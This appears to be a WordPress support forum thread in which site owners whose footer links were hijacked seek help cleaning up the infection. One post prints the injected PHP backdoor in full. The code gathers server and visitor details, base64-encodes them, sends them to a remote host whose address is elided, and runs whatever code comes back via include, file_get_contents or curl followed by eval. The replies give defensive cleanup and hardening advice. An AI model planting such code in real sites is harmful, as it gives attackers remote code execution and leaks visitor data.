Posted 3 years ago #
One of my friends footer link got hacked. His Powered by WordPress link points to differrnt url instead of wordpress.org. I searched for exploits on his wordpress theme files.. And found that the hacked used this code to call the hacked URL.
< ?=@get_wp_results('f');? >
I can't find the injected code !! where is it databse or somewhere else.. Need help Guys... I am Just a Newb...
Posted 3 years ago #
any Updates..??
Some theme authors change the URLs to point to their theme website. Is it a customised theme?
Posted 3 years ago #
Its a customized theme. It was pointing to wordpress.org before hack. i searched through internet and found the hacker injected some .php file with this code
<? error_reporting(0);
$s="e";
$a=(isset($_SERVER["HTTP_HOST"])?$_SERVER["HTTP_HOST"]:$HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"])?$_SERVER["SERVER_NAME"]:$SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"])?$_SERVER["REQUEST_URI"]:$REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"])?$_SERVER["PHP_SELF"]:$PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"])?$_SERVER["QUERY_STRING"]:$QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"])?$_SERVER["HTTP_REFERER"]:$HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"])?$_SERVER["HTTP_USER_AGENT"]:$HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"])?$_SERVER["REMOTE_ADDR"]:$REMOTE_ADDR);
$i=(isset($_SERVER["SCRIPT_FILENAME"])?$_SERVER["SCRIPT_FILENAME"]:$SCRIPT_FILENAME);
$j=(isset($_SERVER["HTTP_ACCEPT_LANGUAGE"])?$_SERVER["HTTP_ACCEPT_LANGUAGE"]:$HTTP_ACCEPT_LANGUAGE);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".". base64_encode($d).".". base64_encode($e).".". base64_encode($f).".". base64_encode($g).".". base64_encode($h).".$s.". base64_encode($i) .".". base64_encode($j);
if((include(base64_decode("...").base64_decode("...")."/?".$str)));
else if(include(base64_decode("...").base64_decode("...")."/?".$str));
else if($c=file_get_contents(base64_decode("...").$str))eval($c);
else{$cu=curl_init(base64_decode("...").$str);
curl_setopt($cu,CURLOPT_RETURNTRANSFER,1);
$str=curl_exec($cu);
curl_close($cu);
eval($str);
}; ?>I deleted all the files. But his Powered by WordPress link points to differrnt url instead of wordpress.org. I think the hacker injected something in the database.
Posted 3 years ago #
anyone.. Out there??? to help me out...
Posted 3 years ago #
I found some base64 code on Wp-admin .. also some new file names. I deleted those files. But no code in the database. Is there any way i can find that..??
Posted 3 years ago #
Koydin, your server would have to be badly misconfigured for those hacks to run in the first place, since there is no <?php tag in the code. If I were you, I'd start from scratch with a new server environment and a new copy of all the WordPress files.
Posted 3 years ago #
Koydin, have you checked out this thread ~ http://wordpress.org/support/topic/370546 ~ it might be simply a matter of removing/editing the effected files from the backdoor ~ http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/
Posted 3 years ago #
and most of these are likely related to the same problem you may have ~ http://wordpress.org/tags/base64
Posted 3 years ago #
koylin, can you help me put with this virus. i got hacked like you. but i don't find the virus untyl now. Can you send me teh code that you found or some help. Thank you. And please hurry whyle all my blogs are hacked at this time on that hostgator server.
Posted 3 years ago #
Can you send me teh code that you found or some help.
You've got a lot of work ahead of you. Here is the boiler plate links for delousing your hacked blog.
http://codex.wordpress.org/FAQ_My_site_was_hacked
http://ottodestruct.com/blog/2009/hacked-wordpress-backdoors/
RVoodoo has written up his experience too.
http://www.rvoodoo.com/2010/02/the-dreaded-base64-wordpress-hack-and-other-hacks-too/
Once you've cleaned out your installation, harden it to stop (or at least slow down) this from happening again.
http://codex.wordpress.org/Hardening_WordPress
Goof luck.
Posted 3 years ago #
My problem is that i found the < ?=@get_wp_results('f');? > code only in my footer but i dont found anything untyl now. And is changing my links but my footer don't shows up. for example http://7don.com
Posted 3 years ago #
So i need to find a modified file or something so i can start to hount it down. But nothing untyl now. I searched in my database, i downloaded my whole website, and searching for "eval" "base64" and thesde tipe of codes in them.
Posted 3 years ago #
Sorry, but every file in your installation is suspect, as well as your database. That's what it means to be hacked.
If you want to fix it then you need to replace every file you can with the freshly downloaded original files, hunt through any files you have left, and scour your database.
Anything less than that won't find it. Once you have found it, then you need to close the door that the attacker came in through.
It's a metric ton of work but that's what is needed. Once again, good luck. The work is outlined in those links.
Posted 3 years ago #
Yeah i understand that but untyl i don't find the modified files i don't want to replace anything. I remowed now the injected code from the footers and i'm wayting if will apear again howewer. I still hawe the virus in my sites. If it's not only injected somehow.
This topic has been closed to new replies.
